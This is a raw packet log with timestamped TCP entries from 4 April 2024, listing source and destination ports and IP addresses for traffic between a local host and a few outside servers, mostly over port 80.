Apr 4, 2024 17:49:07.603090048 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603118896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603132010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603166103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603173971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603173971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603179932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603204966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603226900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603280067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603291988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603303909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603303909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603305101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603318930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603323936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603343964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603360891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603368044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603393078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603399992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603421926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603429079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603446007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603461981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603492975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603497982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603507042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603532076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603555918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603559017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603596926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603600979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603612900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603636026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603655100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603678942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603702068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603739023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603768110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603806019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603816032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603831053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603899002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603925943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603936911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603955984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603960991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.603976011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.603998899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604020119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604036093 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604046106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604059935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604083061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604095936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604106903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604125977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604130983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604146957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604166031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604167938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604212046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604232073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604249001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604273081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604274035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604290962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604315042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604324102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604337931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604352951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604379892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604382992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604397058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604439020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604439974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604455948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604480028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604496956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604525089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604540110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604542971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604553938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604568005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604568005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604587078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604604006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604707003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604720116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604733944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604738951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604767084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604777098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604789972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604806900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604809046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604835987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604847908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604866982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604881048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604896069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604932070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604939938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604947090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604969978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.604995966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.604999065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605011940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605037928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605062962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605072021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605084896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605097055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605107069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605113029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605125904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605140924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605159044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605164051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605182886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605196953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605217934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605221033 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605248928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605252028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605264902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605287075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605298042 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605321884 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605333090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605346918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605360031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605379105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605405092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605417967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605426073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605442047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605452061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605465889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605477095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605494976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605515957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605519056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605556011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605576038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605601072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605608940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605624914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605639935 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605657101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605670929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605684042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605696917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605722904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605742931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605771065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605783939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605806112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605822086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605839968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605853081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605865955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605878115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605906963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605911016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605926037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605937958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605942965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605962992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.605967999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.605998039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606004953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606029987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606066942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606074095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606089115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606118917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606147051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606161118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606173992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606178999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606187105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606204987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606226921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606232882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606264114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606291056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606303930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606317043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.606323957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606343031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.606354952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.691198111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.783665895 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.783725023 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.783823013 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.783869982 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.784018993 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.784056902 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.784813881 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.803061008 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.803091049 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.803107023 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.803148031 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.803162098 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.803227901 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.803246975 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:07.919267893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919284105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919297934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919308901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919344902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919377089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919403076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919408083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919415951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919465065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919466019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919486046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919511080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919563055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919574976 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919583082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919646978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919655085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919667006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919696093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919713020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919724941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919766903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919775009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919783115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919797897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919807911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919828892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919847012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919867992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919882059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919913054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919933081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919943094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919955969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919962883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.919981956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.919987917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920006990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920010090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920034885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920053005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920059919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920066118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920078993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920110941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920162916 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920183897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920192003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920212984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920234919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920242071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920289993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920314074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920397043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920433998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920480013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920528889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920531034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920562029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920608997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920636892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920670033 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920686960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920706034 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920715094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920737982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920767069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920780897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920794964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920835972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920850992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920885086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920886040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920928955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.920929909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920974970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.920993090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921022892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921053886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921053886 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921089888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921104908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921124935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921159983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921216011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921255112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921276093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921295881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921309948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921338081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921339989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921382904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921403885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921457052 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921458006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921499968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921535015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921586037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921590090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921618938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921660900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921689987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921694994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921713114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921744108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921760082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921768904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921818972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921860933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921880007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921911955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921914101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.921982050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.921991110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922034979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922061920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922101974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922111034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922146082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922158957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.922205925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922215939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922262907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.922278881 CEST	49730	80	192.168.2.10	103.23.232.80
